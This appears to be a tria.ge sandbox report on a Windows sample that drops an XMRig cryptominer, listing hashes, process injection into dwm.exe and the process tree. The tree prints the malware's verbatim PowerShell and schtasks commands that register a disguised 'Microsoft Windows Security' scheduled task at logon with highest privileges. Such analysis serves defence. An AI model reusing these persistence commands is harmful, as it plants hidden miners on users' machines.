Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 149s
max time network: 144s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 27/10/2024, 00:09
Behavioral task: behavioral1
Sample: 0x0006000000016d4e-54.exe
Resource: win7-20240903-en
General
Target: 0x0006000000016d4e-54.exe
Size: 10KB
MD5: 96509ab828867d81c1693b614b22f41d
SHA1: c5f82005dbda43cedd86708cc5fc3635a781a67e
SHA256: a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744
SHA512: ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca
SSDEEP: 96:vdHiIV5H6c10lqo9ZYAoQdVDCcJ+587tG6AuJxGE9btz2qhRC7tCEOhd1Q:vdHiQ5HV1wr9KA/J+izJxTZtzthyOhd
Malware Config
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description | pid | Process | procid_target
PID 2640 created 1236 | 2640 | 3621011599.exe | 21
PID 2640 created 1236 | 2640 | 3621011599.exe | 21
PID 1948 created 1236 | 1948 | winupsecvmgr.exe | 21
PID 1948 created 1236 | 1948 | winupsecvmgr.exe | 21
PID 1948 created 1236 | 1948 | winupsecvmgr.exe | 21
Xmrig family
XMRig Miner payload 13 IoCs
resource | yara_rule
behavioral1/memory/1948-36-0x000000013F510000-0x000000013FAA7000-memory.dmp | xmrig
behavioral1/memory/1268-39-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1268-41-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1268-43-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1268-45-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1268-47-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1268-49-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1268-51-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1268-53-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1268-55-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1268-57-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1268-59-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/1268-61-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
Downloads MZ/PE file
Executes dropped EXE 2 IoCs
pid | Process
2640 | 3621011599.exe
1948 | winupsecvmgr.exe
Loads dropped DLL 2 IoCs
pid | Process
1564 | 0x0006000000016d4e-54.exe
3012 | taskeng.exe
Command and Scripting Interpreter: PowerShell 2 IoCs
pid | Process
2804 | powershell.exe
2708 | powershell.exe
Drops file in System32 directory 2 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
Suspicious use of SetThreadContext 2 IoCs
description | pid | Process | procid_target
PID 1948 set thread context of 992 | 1948 | winupsecvmgr.exe | 41
PID 1948 set thread context of 1268 | 1948 | winupsecvmgr.exe | 42
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 0x0006000000016d4e-54.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2408 | schtasks.exe
1936 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid | Process
2640 | 3621011599.exe
2640 | 3621011599.exe
2804 | powershell.exe
2640 | 3621011599.exe
2640 | 3621011599.exe
1948 | winupsecvmgr.exe
1948 | winupsecvmgr.exe
2708 | powershell.exe
1948 | winupsecvmgr.exe
1948 | winupsecvmgr.exe
1948 | winupsecvmgr.exe
1948 | winupsecvmgr.exe
Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2804 | powershell.exe
Token: SeDebugPrivilege | 2708 | powershell.exe
Token: SeLockMemoryPrivilege | 1268 | dwm.exe
Token: SeLockMemoryPrivilege | 1268 | dwm.exe
Suspicious use of FindShellTrayWindow 64 IoCs
pid | Process
1268 | dwm.exe (64 identical entries)
Suspicious use of SendNotifyMessage 64 IoCs
pid | Process
1268 | dwm.exe (64 identical entries)
Suspicious use of WriteProcessMemory 15 IoCs
description | pid | Process | procid_target
PID 1564 wrote to memory of 2640 | 1564 | 0x0006000000016d4e-54.exe | 30
PID 1564 wrote to memory of 2640 | 1564 | 0x0006000000016d4e-54.exe | 30
PID 1564 wrote to memory of 2640 | 1564 | 0x0006000000016d4e-54.exe | 30
PID 1564 wrote to memory of 2640 | 1564 | 0x0006000000016d4e-54.exe | 30
PID 2804 wrote to memory of 2408 | 2804 | powershell.exe | 33
PID 2804 wrote to memory of 2408 | 2804 | powershell.exe | 33
PID 2804 wrote to memory of 2408 | 2804 | powershell.exe | 33
PID 3012 wrote to memory of 1948 | 3012 | taskeng.exe | 37
PID 3012 wrote to memory of 1948 | 3012 | taskeng.exe | 37
PID 3012 wrote to memory of 1948 | 3012 | taskeng.exe | 37
PID 2708 wrote to memory of 1936 | 2708 | powershell.exe | 40
PID 2708 wrote to memory of 1936 | 2708 | powershell.exe | 40
PID 2708 wrote to memory of 1936 | 2708 | powershell.exe | 40
PID 1948 wrote to memory of 992 | 1948 | winupsecvmgr.exe | 41
PID 1948 wrote to memory of 1268 | 1948 | winupsecvmgr.exe | 42
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Windows\Explorer.EXE (PID 1236)
  Command line: C:\Windows\Explorer.EXE
  - C:\Users\Admin\AppData\Local\Temp\0x0006000000016d4e-54.exe (PID 1564)
    Command line: "C:\Users\Admin\AppData\Local\Temp\0x0006000000016d4e-54.exe"
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\3621011599.exe (PID 2640)
      Command line: C:\Users\Admin\AppData\Local\Temp\3621011599.exe
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2804)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\schtasks.exe (PID 2408)
      Command line: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
      - Scheduled Task/Job: Scheduled Task
  - C:\Windows\System32\schtasks.exe (PID 2320)
    Command line: C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2708)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\schtasks.exe (PID 1936)
      Command line: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
      - Scheduled Task/Job: Scheduled Task
  - C:\Windows\System32\conhost.exe (PID 992)
    Command line: C:\Windows\System32\conhost.exe
  - C:\Windows\System32\dwm.exe (PID 1268)
    Command line: C:\Windows\System32\dwm.exe
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
- C:\Windows\system32\taskeng.exe (PID 3012)
  Command line: taskeng.exe {ED16319A-B46C-4A9C-8A20-01941478863C} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe (PID 1948)
    Command line: "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 66a8cf3f9cb8348dcfc201eb2d42924a
  SHA1: fd04f7e8f6ca208c03662f4d3f1324d686a732ce
  SHA256: 798c8fddd54b5f0812c9b0428176e8cad353616d8541d4c2f9625338f6cf28b7
  SHA512: dc9c41cab8cf34f7ac5b2649b62d0bda5251765395b15d16f39442d091e018d0aae656b51858b237ccdfc826e09eedc13267fdbc26cc086e133d2026e8b240a3
- (second file)
  Filesize: 5.6MB
  MD5: 13b26b2c7048a92d6a843c1302618fad
  SHA1: 89c2dfc01ac12ef2704c7669844ec69f1700c1ca
  SHA256: 1753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256
  SHA512: d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455